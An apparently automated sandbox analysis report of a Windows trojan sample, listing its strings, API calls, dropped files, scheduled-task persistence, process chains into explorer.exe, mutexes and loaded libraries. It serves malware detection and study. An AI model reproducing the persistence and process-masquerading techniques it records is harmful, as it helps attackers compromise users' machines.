Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclRTTI.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclResources.pa
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSimpleXml.pa
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclStreams.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclStringConver
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclStrings.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSynch.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSysInfo.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSysUtils.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclUnicode.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclUnitVersioni
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclWideStrings.
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/bzip2.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/zlibh.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclConsole.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclRegistry.pa
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclSecurity.pa
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclShell.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclWin32.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/Snmp.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/sevenzip.pas
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02EE61F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

12_2_02EE61F0

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Code function: 0_2_0063251D NtQuerySystemInformation,

0_2_0063251D

Source: C:\Windows\SysWOW64\comp.exe

File created: C:\Windows\Tasks\ServiceHub Controller.job

Jump to behavior

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Code function: 0_2_00630739	0_2_00630739
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02EE61F0	12_2_02EE61F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02EEB700	12_2_02EEB700
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F52000	12_2_02F52000
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F1C467	12_2_02F1C467
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F12930	12_2_02F12930
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02EE4EF0	12_2_02EE4EF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F1CC09	12_2_02F1CC09
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F0F3EB	12_2_02F0F3EB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02EE51A0	12_2_02EE51A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F21679	12_2_02F21679
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F0B4B0	12_2_02F0B4B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02EE5450	12_2_02EE5450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F25A76	12_2_02F25A76
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F25B96	12_2_02F25B96
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F57E2D	12_2_02F57E2D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F23DE9	12_2_02F23DE9

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02F03F40 appears 136 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02F0A560 appears 56 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02F09D11 appears 60 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02F03030 appears 53 times

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Static PE information: invalid certificate

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1384464950.0000000006718000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000000.1349110939.00000000009E2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamenode.exe* vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1389532302.00000000074DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamezip.exe( vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000000.1348154278.000000000041B000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000000.1348154278.000000000041B000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1376105942.00000000056A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1376105942.00000000056A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1376105942.00000000056A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenode.exe* vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Binary or memory string: OriginalFilename vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Binary or memory string: OriginalFileName vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Binary or memory string: OriginalFilenamenode.exe* vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.troj.evad.winEXE@18/10@37/1

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02EEE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,

12_2_02EEE8D0

Source: C:\Windows\SysWOW64\comp.exe

File created: C:\Users\user\AppData\Roaming\TlsServer

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_1820
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_3632
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:120:WilError_03
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_6072
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3420:120:WilError_03

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

File created: C:\Users\user\AppData\Local\Temp\d2d22b7a

Jump to behavior

Source: Yara match	File source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, type: SAMPLE
Source: Yara match	File source: 0.0.BGUO31BLG4WQAOX9MA4VF71OJ1M.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1348154278.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1376105942.000000000568C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

ReversingLabs: Detection: 13%

Source: explorer.exe	String found in binary or memory: " /add
Source: explorer.exe	String found in binary or memory: " /add /y
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: FILENAME-START
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: FILENAME-STOP
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: FILESIZE-START
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: FILESIZE-STOP
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: FILEPACKEDSIZE-START
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: FILEPACKEDSIZE-STOP
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: <html><head><META http-equiv=Content-Type content="text/html; charset=utf-8"></head><body><!--StartFragment-->
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: n<html><head><META http-equiv=Content-Type content="text/html; charset=utf-8"></head><body><!--StartFragment-->
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: -help
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	String found in binary or memory: SYNTAX: -add filename (switches)

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

File read: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe "C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe"
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Process created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Process created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: svrapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: shunimpl.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: svrapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: shunimpl.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: d3d11.dll	Jump to behavior
